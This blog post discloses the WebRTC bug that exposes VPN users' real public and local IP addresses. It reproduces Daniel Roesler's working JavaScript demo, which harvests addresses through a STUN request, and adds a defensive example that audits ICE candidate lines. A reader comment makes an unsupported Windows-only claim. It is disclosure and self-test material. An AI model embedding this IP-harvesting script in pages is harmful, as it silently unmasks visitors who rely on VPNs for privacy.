WebRTC vulnerability exposes VPN users

It's now easy to expose the true IP address of VPN users. Daniel Roesler published an example of how to exploit the bug on GitHub. Firefox, Mozilla, Chrome and Internet Explorer (with WebRTC plugin) are vulnerable to this bug. WebRTC is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using a VPN, the computer's internal network address will be exposed. WebRTC uses this implementation to handle NAT on the network and to bind sessions to the public IP. However, the bug is really nasty because it exposes these functions to JavaScript, so the entire implementation below is written in JavaScript. The request is not registered in the developer console and cannot be blocked by plugins.

If the user is using a lightweight VPN client, like a Chrome plugin, the VPN will be bypassed altogether and both the real public IP and the internal NAT address will be shown.

Below is a demo: if you see your public and private IP addresses, your browser is vulnerable to this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

Your public IP addresses:

[javascript]
<script>
function getIPs(){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){
        //skip non-candidate events
        if(ice.candidate){
            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined){
                var li = document.createElement("li");
                li.textContent = ip_addr;

                //local IPs
                if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01])\.)/))
                    document.getElementById("localip").appendChild(li);
                //assume the rest are public IPs
                else
                    document.getElementById("publicip").appendChild(li);
            }
            ip_dups[ip_addr] = true;
        }
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){
        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});
    }, function(){});
}

//run the demo; results are appended to the "localip" and "publicip" lists
getIPs();
</script>
[/javascript]
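
To check what a given browser and VPN setup actually hands to a script, the ICE candidate strings can be parsed field by field and each address classified by CIDR range instead of by string prefix. This is an added example, not part of Daniel Roesler's code or the original post; the function names and the sample candidate lines are constructed for illustration, and the `.local` case assumes a browser that replaces host addresses with mDNS names.

```javascript
// Added example: classify what each ICE candidate line reveals about the host.
// CIDR ranges treated as non-routable: RFC 1918 plus IPv4 link-local.
const PRIVATE_V4 = [["10.0.0.0", 8], ["172.16.0.0", 12], ["192.168.0.0", 16], ["169.254.0.0", 16]];

// Convert dotted-quad text to an integer; null if it is not a valid IPv4 address.
function v4ToInt(addr) {
  const parts = addr.split(".");
  if (parts.length !== 4 || parts.some(p => !/^\d{1,3}$/.test(p) || Number(p) > 255)) return null;
  return parts.reduce((acc, p) => acc * 256 + Number(p), 0);
}

function classifyAddress(addr) {
  if (/\.local$/i.test(addr)) return "mdns-obfuscated"; // browser hid the host address
  const n = v4ToInt(addr);
  if (n === null) return "other";                        // IPv6 or unrecognised
  for (const [base, bits] of PRIVATE_V4) {
    const start = v4ToInt(base);
    if (n >= start && n < start + 2 ** (32 - bits)) return "private-v4";
  }
  return "public-v4";
}

// Grammar: candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type>
function parseCandidate(line) {
  const m = /^(?:a=)?candidate:\S+ \d+ \S+ \d+ (\S+) (\d+) typ (\S+)/.exec(line.trim());
  return m ? { address: m[1], port: Number(m[2]), type: m[3], exposure: classifyAddress(m[1]) } : null;
}

// Group the distinct addresses in a list of candidate lines by exposure class.
function auditCandidates(lines) {
  const report = { "private-v4": [], "public-v4": [], "mdns-obfuscated": [], "other": [] };
  for (const line of lines) {
    const c = parseCandidate(line);
    if (c && !report[c.exposure].includes(c.address)) report[c.exposure].push(c.address);
  }
  return report;
}

// Constructed sample candidates, not captured from a real session.
const SAMPLE = [
  "candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host",
  "candidate:2 1 udp 1686052607 203.0.113.45 54321 typ srflx raddr 192.168.1.23 rport 54321",
  "candidate:3 1 udp 2122260223 172.20.5.9 50000 typ host",
  "candidate:4 1 udp 2122260223 3f2a1c9e-8b7d-4e6f-9a0b-1c2d3e4f5a6b.local 50001 typ host",
  "candidate:5 1 udp 2122260223 172.200.1.1 50002 typ host", // public: outside 172.16.0.0/12
];
console.log(auditCandidates(SAMPLE));
```

An empty `private-v4` list and a `public-v4` list containing only the VPN exit address is the result a correctly tunnelled browser should produce.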

1 Comments on “WebRTC vulnerability exposes VPN users”

1. The security glitch affects WebRTC-supporting browsers such as Google Chrome and Mozilla Firefox, and appears to be limited to Windows operating system only, although users of Linux and Mac OS X are not affected by this vulnerability.
